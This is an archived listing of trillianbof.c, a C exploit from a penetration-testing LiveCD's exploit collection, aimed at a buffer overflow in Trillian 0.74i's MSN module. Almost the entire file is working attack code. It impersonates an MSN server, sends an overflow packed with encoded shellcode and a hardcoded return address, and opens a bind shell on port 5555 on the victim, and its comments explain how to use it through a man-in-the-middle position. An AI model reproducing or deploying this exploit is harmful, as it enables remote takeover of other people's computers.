home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / im / trillian / trillianbof.c < prev   
C/C++ Source or Header  |  2005-02-12  |  4KB  |  116 lines
  1. /*
  2.     Cerulean Studios Trillian 0.74i Buffer Overflow in MSN module exploit
  3.     created by Komrade  -  http://unsecure.altervista.org
  4.  
  5.     Written for Windows 2000 / Windows XP.
  6.     Tested on Windows XP Professional sp0.
  7.  
  8.     This exploit spawn a shell on port 5555, you have just to execute the
  9.     program and connect to port 5555.
  10.     
  11.     This exploit requires the use of the man-in-the-middle technique.
  12. */
  13.  
  14. #include <windows.h>
  15. #include <winsock.h>
  16. #include <stdio.h>
  17. #include <string.h>
  18.  
  19. int main(int argc,char **argv){
  20.  
  21.     char shellcode[] =
  22.     "\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x66\x01\x80\x34\x0A\x99\xE2\xFA\xEB"
  23.     "\x05\xE8\xEB\xFF\xFF\xFF\x70\x99\x98\x99\x99\xC3\xFD\x12\xD8\xA9\x12"
  24.     "\xD9\x95\x12\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x9A\x6A\x12"
  25.     "\xEF\xE1\x9A\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8"
  26.     "\x12\xA6\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E"
  27.     "\x9D\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A"
  28.     "\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58\x12"
  29.     "\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0\x71\xE5"
  30.     "\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41\xF3\x9D\xC0"
  31.     "\x71\xF0\x99\x99\x99\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B\x66\xCE\x69\x12"
  32.     "\x41\x5E\x9E\x9B\x99\x8C\x2A\xAA\x59\x10\xDE\x9D\xF3\x89\xCE\xCA\x66"
  33.     "\xCE\x6D\xF3\x98\xCA\x66\xCE\x61\xC9\xC9\xCA\x66\xCE\x65\x1A\x75\xDD"
  34.     "\x12\x6D\xAA\x42\xF3\x89\xC0\x10\x85\x17\x7B\x62\x10\xDF\xA1\x10\xDF"
  35.     "\xA5\x10\xDF\xD9\x5E\xDF\xB5\x98\x98\x99\x99\x14\xDE\x89\xC9\xCF\xCA"
  36.     "\xCA\xCA\xF3\x98\xCA\xCA\x5E\xDE\xA5\xFA\xF4\xFD\x99\x14\xDE\xA5\xC9"
  37.     "\xCA\x66\xCE\x7D\xC9\x66\xCE\x71\xAA\x59\x35\x1C\x59\xEC\x60\xC8\xCB"
  38.     "\xCF\xCA\x66\x4B\xC3\xC0\x32\x7B\x77\xAA\x59\x5A\x71\x62\x67\x66\x66"
  39.     "\xDE\xFC\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD\xEB\xFC\xEA\xEA\x99\xDA\xEB"
  40.     "\xFC\xF8\xED\xFC\xC9\xEB\xF6\xFA\xFC\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED"
  41.     "\xC9\xEB\xF6\xFA\xFC\xEA\xEA\x99\xD5\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8"
  42.     "\xEB\xE0\xD8\x99\xEE\xEA\xAB\xC6\xAA\xAB\x99\xCE\xCA\xD8\xCA\xF6\xFA"
  43.     "\xF2\xFC\xED\xD8\x99\xFB\xF0\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99"
  44.     "\xF8\xFA\xFA\xFC\xE9\xED\x99";
  45.  
  46.  
  47.     SOCKET sock, client;
  48.     struct sockaddr_in sock_addr, client_addr;
  49.     WSADATA data;
  50.     WORD p;
  51.     char mess[4096];
  52.     int lun, n, i;
  53.  
  54.     p = MAKEWORD(2, 0);
  55.     WSAStartup(p, &data);
  56.  
  57.     printf("------------------------------------------------------------------------\r\n");
  58.     printf("-  Cerulean Studios Trillian 0.74i MSN module Buffer Overflow exploit  -\r\n");
  59.     printf("-                   for Windows 2000 / Windows XP                      -\r\n");
  60.     printf("-                                                                      -\r\n");
  61.     printf("-         created by Komrade  -  http://unsecure.altervista.org        -\r\n");
  62.     printf("------------------------------------------------------------------------\r\n");
  63.  
  64.     sock = socket(PF_INET,SOCK_STREAM, 0);
  65.     sock_addr.sin_family = PF_INET;
  66.     sock_addr.sin_port = htons(1863);
  67.     sock_addr.sin_addr.s_addr = INADDR_ANY;
  68.  
  69.     bind(sock, (struct sockaddr*)&sock_addr, sizeof(struct sockaddr_in));
  70.     listen(sock,1);
  71.  
  72.     lun = sizeof (struct sockaddr);
  73.  
  74.     printf("\r\nWaiting for a connection...\r\n");
  75.  
  76.     client = accept(sock, (struct sockaddr*)&client_addr, &lun);
  77.     if (client <= 0){
  78.         printf("Unable to wait for connections\r\n");
  79.         exit(-1);
  80.     }
  81.  
  82.     n=recv(client, mess, sizeof(mess),0);
  83.     if (n < 0){
  84.         printf("Error receving connections\r\n");
  85.         exit(-1);
  86.     }
  87.  
  88.     printf("Received a connection request from a client.\r\n");
  89.  
  90.     strcpy(mess, shellcode);
  91.  
  92.     for(i=strlen(shellcode); i < 4090; i++)
  93.         mess[i]='x';
  94.  
  95.     mess[i]=0x33;    /**/
  96.     mess[i+1]=0x12;    /*return address of a "call ebx" command in trillian.exe*/
  97.     mess[i+2]=0x40;    /**/
  98.     mess[i+3]='\r';
  99.     mess[i+4]='\n';
  100.     mess[i+5]='\0';
  101.  
  102.     n = send(client, mess, strlen(mess),0);
  103.     if (n > 0){
  104.         printf("Exploit sent succesfully.\r\n");
  105.         printf("Now connect to port 5555.\r\n");
  106.     }
  107.     else
  108.         printf("Error sending the exploit\r\n");
  109.  
  110.     closesocket (client);
  111.     closesocket(sock);
  112.     WSACleanup();
  113.     return 0;
  114. }
  115.  
  116.